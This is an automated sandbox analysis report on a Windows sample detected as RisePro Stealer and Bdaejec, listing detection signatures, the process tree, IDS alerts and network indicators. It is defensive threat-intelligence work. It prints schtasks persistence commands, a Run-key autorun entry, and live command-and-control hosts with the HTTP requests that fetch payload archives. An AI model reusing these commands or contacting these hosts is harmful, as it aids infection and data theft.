Edit tour

Windows Analysis Report
hunta[1].exe

Overview

General Information

Sample name:	hunta[1].exe
Analysis ID:	1480972
MD5:	651de10cfaaa78be50eda9f3f0ce9ea7
SHA1:	6b922567fc5880e38fc9a3eacc24f6bab3785731
SHA256:	e5cb4f3f8d41c28116b9ff3253ab5f6d6736e18da2d225cf15379954b2751643
Tags:	exe
Infos:

Detection

Bdaejec, RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Bdaejec

Yara detected RisePro Stealer

AI detected suspicious sample

Found stalling execution ending in API Sleep call

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

hunta[1].exe (PID: 7416 cmdline: "C:\Users\user\Desktop\hunta[1].exe" MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)

WwKLWFk.exe (PID: 7456 cmdline: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 8000 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8048 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MPGPH131.exe (PID: 8104 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)

MPGPH131.exe (PID: 8124 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)

RageMP131.exe (PID: 5640 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)

WwKLWFk.exe (PID: 1836 cmdline: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 3964 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RageMP131.exe (PID: 4228 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: hunta[1].exe PID: 7416	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: WwKLWFk.exe PID: 7456	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: MPGPH131.exe PID: 8104	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MPGPH131.exe PID: 8124	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RageMP131.exe PID: 5640	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: WwKLWFk.exe PID: 1836	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: RageMP131.exe PID: 4228	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Click to see the 12 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\hunta[1].exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.10 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T02:17:03.940751+0200
SID:	2046269
Source Port:	49725
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.10 - Destination IP: 20.189.173.21

Timestamp:	2024-07-25T02:16:43.753403+0200
SID:	2028371
Source Port:	49718
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:16:37.270173+0200
SID:	2807908
Source Port:	49710
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.10 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T02:16:43.236158+0200
SID:	2046269
Source Port:	49713
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.10 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T02:16:30.189325+0200
SID:	2838522
Source Port:	59684
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:16:56.571937+0200
SID:	2807908
Source Port:	49723
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:16:53.692444+0200
SID:	2807908
Source Port:	49721
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.10 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T02:16:34.626885+0200
SID:	2049060
Source Port:	49709
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.10 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T02:16:57.861221+0200
SID:	2046269
Source Port:	49722
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.10 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T02:16:43.267413+0200
SID:	2046269
Source Port:	49714
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:16:34.027382+0200
SID:	2807908
Source Port:	49708
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.10 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T02:16:40.273973+0200
SID:	2049060
Source Port:	49713
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:17:00.839786+0200
SID:	2807908
Source Port:	49724
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:17:03.563869+0200
SID:	2807908
Source Port:	49726
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:16:50.770303+0200
SID:	2807908
Source Port:	49720
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.10 - Destination IP: 193.233.132.62

Timestamp:	2024-07-25T02:16:37.631540+0200
SID:	2046269
Source Port:	49709
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.10

Timestamp:	2024-07-25T02:17:24.819852+0200
SID:	2022930
Source Port:	443
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.10 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T02:16:30.743771+0200
SID:	2807908
Source Port:	49707
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.10

Timestamp:	2024-07-25T02:16:47.540655+0200
SID:	2022930
Source Port:	443
Destination Port:	49719
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hunta[1].exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rars	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarA	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarppData	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar1	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarV	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rar	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/O	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar8	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/d	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rar5	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC:	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\MPGPH131\MPGPH131.exe	ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	ReversingLabs: Detection: 92%

Multi AV Scanner detection for submitted file

Source: hunta[1].exe

ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hunta[1].exe

Joe Sandbox ML: detected

Source: hunta[1].exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		4_2_002129E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		22_2_00B529E2

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Code function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

4_2_00212B8C

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 799

Source: global traffic	TCP traffic: 192.168.2.10:49707 -> 44.221.84.105:799
Source: global traffic	TCP traffic: 192.168.2.10:49709 -> 193.233.132.62:50500

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 193.233.132.62 193.233.132.62
Source: Joe Sandbox View	IP Address: 193.233.132.62 193.233.132.62

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\hunta[1].exe

Code function: 2_2_00E9DB60 recv,WSAStartup,closesocket,socket,connect,closesocket,

2_2_00E9DB60

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

